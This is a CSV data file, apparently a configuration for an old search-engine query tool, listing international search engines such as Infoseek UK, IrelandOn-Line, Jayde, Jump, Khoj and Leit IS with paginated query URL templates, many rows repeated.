"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","0"
"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","0"
"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","0"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","1"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","0"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","0"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","0"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","0"
"International","Infoseek UK 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=20&sa=N","0"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","1"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","0"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","0"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","0"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","0"
"International","Infoseek UK 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=30&sa=N","0"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","1"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","0"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","0"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","0"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","0"
"International","Infoseek UK 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=40&sa=N","0"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","1"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","0"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","0"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","0"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","0"
"International","IrelandOn-Line","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d10%26client%3desat-ie&start=0","0"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","1"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","0"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","0"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","0"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","0"
"International","IrelandOn-Line 2 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&sitesearch=&hl=en&oe=latin1&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26sitesearch%3d%26hl%3den%26client%3desat-ie&start=10","0"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","1"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","0"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","0"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","0"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","0"
"International","IrelandOn-Line 3 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d0%26client%3desat-ie&start=20","0"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","1"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","0"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","0"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","0"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","0"
"International","IrelandOn-Line 4 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d20%26client%3desat-ie&start=30","0"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","1"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","0"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","0"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","0"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","0"
"International","IrelandOn-Line 5 (Next 10)","http://search.iol.ie/cgi-bin/search?num=10&q={SEARCH_KEYWORD}&allselected=checked&hl=en&oe=latin1&sitesearch=&google_url=http%3a%2f%2fwww.google.com%2fsearch%3fnum%3d10%26output%3dxml%26q%3d{SEARCH_KEYWORD}%26hl%3den%26sitesearch%3d%26start%3d30%26client%3desat-ie&start=40","0"
"International","Jayde","http://search.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business","0"
"International","Jayde","http://dir.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business&search=search","0"
"International","Jayde","http://dir.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business&search=search","0"
"International","Jayde","http://search.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business","0"
"International","Jayde","http://search.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business","0"
"International","Jayde","http://dir.jayde.com/cgi-bin/search.pl?a=0&query={SEARCH_KEYWORD}&engine=business&search=search","0"
"International","Jayde 2 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=10&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 2 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=10&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 2 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=10&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 2 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=25&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 2 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=25&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 2 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=25&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 3 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=20&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 3 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=20&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 3 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=20&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 3 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=50&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 3 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=50&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 3 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=50&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 4 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=30&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 4 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=30&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 4 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=30&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 4 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=75&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 4 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=75&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 4 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=75&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 5 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=40&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 5 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=40&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 5 (Next 10)","http://search.jayde.com/cgi-bin/search.pl?r=40&q={SEARCH_KEYWORD}&w=&k=&s=&e=Jayde%20Search%20Results&o=&m=&X=7999&a=0","0"
"International","Jayde 5 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=100&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 5 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=100&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jayde 5 (Next 25)","http://dir.jayde.com/cgi-bin/search.pl?r=100&q={SEARCH_KEYWORD}&w=&k=&s=&e=Search%20Results&o=&m=&X=20054&a=0&ph=","0"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","1"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","0"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","0"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","0"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","0"
"International","Jump","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&JumpType=0","0"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","1"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","0"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","0"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","0"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","0"
"International","Jump 2 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=10","0"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","1"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","0"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","0"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","0"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","0"
"International","Jump 3 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=20","0"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","1"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","0"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","0"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","0"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","0"
"International","Jump 4 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=30","0"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","1"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","0"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","0"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","0"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","0"
"International","Jump 5 (Next 10)","http://www.jump.co.za/results.asp?q={SEARCH_KEYWORD}&RecNo=40","0"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","1"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","0"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","0"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","0"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","0"
"International","Khoj","http://khoj.com/bin/khojsearchnew?keyword={SEARCH_KEYWORD}&start=0&chkwww=0","0"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","1"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","0"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","0"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","0"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","0"
"International","Khoj 2 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=20","0"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","1"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","0"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","0"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","0"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","0"
"International","Khoj 3 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=40","0"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","1"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","0"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","0"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","0"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","0"
"International","Khoj 4 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=60","0"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","1"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","0"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","0"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","0"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","0"
"International","Khoj 5 (Next 20)","http://www.khoj.com/bin/khojsearch?keyword={SEARCH_KEYWORD}&start=80","0"
"International","Leit IS","http://leitarvel.leit.is/query.html?qt={SEARCH_KEYWORD}","1"
"International","Leit IS","http://leitarvel.leit.is/query.html?qt={SEARCH_KEYWORD}","0"
"International","Leit IS","http://leitarvel.leit.is/query.html?qt={SEARCH_KEYWORD}","0"
"International","Leit IS 2 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=11&nh=10&lk=1&rf=0","1"
"International","Leit IS 2 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=11&nh=10&lk=1&rf=0","0"
"International","Leit IS 2 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=11&nh=10&lk=1&rf=0","0"
"International","Leit IS 3 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=21&nh=10&lk=1&rf=0","1"
